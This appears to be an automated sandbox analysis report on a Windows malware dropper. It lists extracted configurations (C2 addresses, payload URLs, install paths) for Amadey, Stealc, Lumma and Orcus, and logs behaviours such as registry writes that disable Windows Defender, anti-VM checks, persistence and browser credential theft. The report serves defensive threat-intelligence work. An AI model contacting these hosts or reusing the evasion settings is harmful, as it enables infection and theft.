Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-12-2024 02:26
Static task
static1
General
-
Target
3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe
-
Size
1.8MB
-
MD5
d9e5b3e60c19b797259b97ef6e32f5aa
-
SHA1
7ed4d22371345fb3865c05b4875a8bd9c67fe402
-
SHA256
3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e
-
SHA512
f7a505900f13d7f6670dd8801da2d61c0eb0d6f1c23f84a5147d667eb9a74a514ade6d3982a6583fbf3b9d6e6d143402902cbf763957c40aedb28e26c2543b2d
-
SSDEEP
24576:C5QP0nNsVCueidcrK6eoskxbRukOMtVbH+pnCLiNfUZS+ii12WoQ3YZ:C5QP0nNdikKtkx9lDeVcTeU
Malware Config
Extracted
https://exodus.lat/COMSurrogate.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
drum
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
gcleaner
92.63.197.221
45.91.200.135
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
orcus
45.74.38.211:4782
7a9c0f279c464958aebbd585f20f1cf2
-
autostart_method
Disable
-
enable_keylogger
false
-
install_path
%programfiles%\Orcus\Orcus.exe
-
reconnect_delay
10000
-
registry_keyname
Orcus
-
taskscheduler_taskname
Orcus
-
watchdog_path
AppData\OrcusWatchdog.exe
Extracted
lumma
https://atten-supporse.biz/api
https://se-blurry.biz/api
https://zinc-sneark.biz/api
https://dwell-exclaim.biz/api
https://formy-spill.biz/api
https://covery-mover.biz/api
https://dare-curbys.biz/api
https://print-vexer.biz/api
Signatures
-
Amadey family
-
Gcleaner family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 08bf4e72b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 08bf4e72b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 08bf4e72b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 08bf4e72b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 08bf4e72b2.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 08bf4e72b2.exe -
Orcus family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1284 created 3524 1284 Dr.com 56 -
TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
-
Ta505 family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 06d41594d9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ca0fc6777c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 38f25d7919.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 08bf4e72b2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Orcurs Rat Executable 1 IoCs
resource yara_rule behavioral2/memory/5340-1214-0x0000000000F30000-0x0000000001334000-memory.dmp orcus -
Blocklisted process makes network request 3 IoCs
flow pid Process 213 5944 powershell.exe 215 5656 powershell.exe 216 5528 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2848 powershell.exe 3256 powershell.exe 5656 powershell.exe 5528 powershell.exe 1292 powershell.exe 5956 powershell.exe 5944 powershell.exe 2056 powershell.exe 2848 powershell.exe 3256 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 06d41594d9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ca0fc6777c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 38f25d7919.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 08bf4e72b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 38f25d7919.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 08bf4e72b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ca0fc6777c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 06d41594d9.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation wL3EGdM.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Executes dropped EXE 17 IoCs
pid Process 728 skotes.exe 116 i1A5m12.exe 2648 i1A5m12.tmp 3128 rafencoder.exe 4704 skotes.exe 3616 wL3EGdM.exe 1284 Dr.com 1252 ca0fc6777c.exe 2388 06d41594d9.exe 544 38f25d7919.exe 1292 f672d1755a.exe 4136 08bf4e72b2.exe 5340 RegAsm.exe 2000 smartscreen.exe 5476 skotes.exe 2388 COMSurrogate.exe 5844 skotes.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 06d41594d9.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 08bf4e72b2.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine ca0fc6777c.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 38f25d7919.exe -
Loads dropped DLL 2 IoCs
pid Process 2648 i1A5m12.tmp 3128 rafencoder.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 08bf4e72b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 08bf4e72b2.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\06d41594d9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\06d41594d9.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\38f25d7919.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\38f25d7919.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f672d1755a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\f672d1755a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\08bf4e72b2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\08bf4e72b2.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" smartscreen.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM Surrogate = "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe" COMSurrogate.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 217 api.ipify.org 218 api.ipify.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023c76-537.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 956 tasklist.exe 3820 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 400 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe 728 skotes.exe 4704 skotes.exe 1252 ca0fc6777c.exe 2388 06d41594d9.exe 544 38f25d7919.exe 4136 08bf4e72b2.exe 5476 skotes.exe 5844 skotes.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe File opened for modification C:\Windows\MovieArchives wL3EGdM.exe File opened for modification C:\Windows\PackageExpression wL3EGdM.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 5980 2388 WerFault.exe 120 5988 2388 WerFault.exe 120 -
System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 38f25d7919.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ca0fc6777c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f672d1755a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language f672d1755a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i1A5m12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage f672d1755a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i1A5m12.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wL3EGdM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rafencoder.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 06d41594d9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Dr.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08bf4e72b2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Kills process with taskkill 5 IoCs
pid Process 4936 taskkill.exe 2828 taskkill.exe 2880 taskkill.exe 2128 taskkill.exe 4468 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings firefox.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4892 schtasks.exe 3088 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 400 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe 400 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe 728 skotes.exe 728 skotes.exe 2648 i1A5m12.tmp 2648 i1A5m12.tmp 4704 skotes.exe 4704 skotes.exe 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1252 ca0fc6777c.exe 1252 ca0fc6777c.exe 2388 06d41594d9.exe 2388 06d41594d9.exe 544 38f25d7919.exe 544 38f25d7919.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 4136 08bf4e72b2.exe 4136 08bf4e72b2.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 4136 08bf4e72b2.exe 4136 08bf4e72b2.exe 4136 08bf4e72b2.exe 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 1284 Dr.com 5340 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 956 tasklist.exe Token: SeDebugPrivilege 3820 tasklist.exe Token: SeDebugPrivilege 4936 taskkill.exe Token: SeDebugPrivilege 2828 taskkill.exe Token: SeDebugPrivilege 2880 taskkill.exe Token: SeDebugPrivilege 2128 taskkill.exe Token: SeDebugPrivilege 4468 taskkill.exe Token: SeDebugPrivilege 3408 firefox.exe Token: SeDebugPrivilege 3408 firefox.exe Token: SeDebugPrivilege 4136 08bf4e72b2.exe Token: SeDebugPrivilege 5340 RegAsm.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 5944 powershell.exe Token: SeDebugPrivilege 3256 powershell.exe Token: SeDebugPrivilege 5656 powershell.exe Token: SeDebugPrivilege 5528 powershell.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 5956 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeDebugPrivilege 2388 COMSurrogate.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 400 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe 2648 i1A5m12.tmp 1284 Dr.com 1284 Dr.com 1284 Dr.com 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe -
Suspicious use of SendNotifyMessage 34 IoCs
pid Process 1284 Dr.com 1284 Dr.com 1284 Dr.com 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 3408 firefox.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe 1292 f672d1755a.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3408 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 400 wrote to memory of 728 400 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe 83 PID 400 wrote to memory of 728 400 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe 83 PID 400 wrote to memory of 728 400 3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe 83 PID 728 wrote to memory of 116 728 skotes.exe 85 PID 728 wrote to memory of 116 728 skotes.exe 85 PID 728 wrote to memory of 116 728 skotes.exe 85 PID 116 wrote to memory of 2648 116 i1A5m12.exe 86 PID 116 wrote to memory of 2648 116 i1A5m12.exe 86 PID 116 wrote to memory of 2648 116 i1A5m12.exe 86 PID 2648 wrote to memory of 4852 2648 i1A5m12.tmp 87 PID 2648 wrote to memory of 4852 2648 i1A5m12.tmp 87 PID 2648 wrote to memory of 4852 2648 i1A5m12.tmp 87 PID 2648 wrote to memory of 3128 2648 i1A5m12.tmp 89 PID 2648 wrote to memory of 3128 2648 i1A5m12.tmp 89 PID 2648 wrote to memory of 3128 2648 i1A5m12.tmp 89 PID 4852 wrote to memory of 4352 4852 net.exe 90 PID 4852 wrote to memory of 4352 4852 net.exe 90 PID 4852 wrote to memory of 4352 4852 net.exe 90 PID 728 wrote to memory of 3616 728 skotes.exe 94 PID 728 wrote to memory of 3616 728 skotes.exe 94 PID 728 wrote to memory of 3616 728 skotes.exe 94 PID 3616 wrote to memory of 2680 3616 wL3EGdM.exe 95 PID 3616 wrote to memory of 2680 3616 wL3EGdM.exe 95 PID 3616 wrote to memory of 2680 3616 wL3EGdM.exe 95 PID 2680 wrote to memory of 956 2680 cmd.exe 100 PID 2680 wrote to memory of 956 2680 cmd.exe 100 PID 2680 wrote to memory of 956 2680 cmd.exe 100 PID 2680 wrote to memory of 4564 2680 cmd.exe 101 PID 2680 wrote to memory of 4564 2680 cmd.exe 101 PID 2680 wrote to memory of 4564 2680 cmd.exe 101 PID 2680 wrote to memory of 3820 2680 cmd.exe 102 PID 2680 wrote to memory of 3820 2680 cmd.exe 102 PID 2680 wrote to memory of 3820 2680 cmd.exe 102 PID 2680 wrote to memory of 3408 2680 cmd.exe 103 PID 2680 wrote to memory of 3408 2680 cmd.exe 103 PID 2680 wrote to memory of 3408 2680 cmd.exe 103 PID 2680 wrote to memory of 3492 2680 cmd.exe 104 PID 2680 wrote to memory of 3492 2680 cmd.exe 104 PID 2680 wrote to memory of 3492 2680 cmd.exe 104 PID 2680 wrote to memory of 1592 2680 cmd.exe 105 PID 2680 wrote to memory of 1592 2680 cmd.exe 105 PID 2680 wrote to memory of 1592 2680 cmd.exe 105 PID 2680 wrote to memory of 1284 2680 cmd.exe 106 PID 2680 wrote to memory of 1284 2680 cmd.exe 106 PID 2680 wrote to memory of 1284 2680 cmd.exe 106 PID 2680 wrote to memory of 3976 2680 cmd.exe 107 PID 2680 wrote to memory of 3976 2680 cmd.exe 107 PID 2680 wrote to memory of 3976 2680 cmd.exe 107 PID 1284 wrote to memory of 2104 1284 Dr.com 108 PID 1284 wrote to memory of 2104 1284 Dr.com 108 PID 1284 wrote to memory of 2104 1284 Dr.com 108 PID 1284 wrote to memory of 4892 1284 Dr.com 110 PID 1284 wrote to memory of 4892 1284 Dr.com 110 PID 1284 wrote to memory of 4892 1284 Dr.com 110 PID 2104 wrote to memory of 3088 2104 cmd.exe 112 PID 2104 wrote to memory of 3088 2104 cmd.exe 112 PID 2104 wrote to memory of 3088 2104 cmd.exe 112 PID 728 wrote to memory of 1252 728 skotes.exe 115 PID 728 wrote to memory of 1252 728 skotes.exe 115 PID 728 wrote to memory of 1252 728 skotes.exe 115 PID 728 wrote to memory of 2388 728 skotes.exe 120 PID 728 wrote to memory of 2388 728 skotes.exe 120 PID 728 wrote to memory of 2388 728 skotes.exe 120 PID 728 wrote to memory of 544 728 skotes.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3524
-
C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe"C:\Users\Admin\AppData\Local\Temp\3d7006312157afde3e4e4393d7a6d116cb7b2b8c0d29f8c22565c6a367c2919e.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
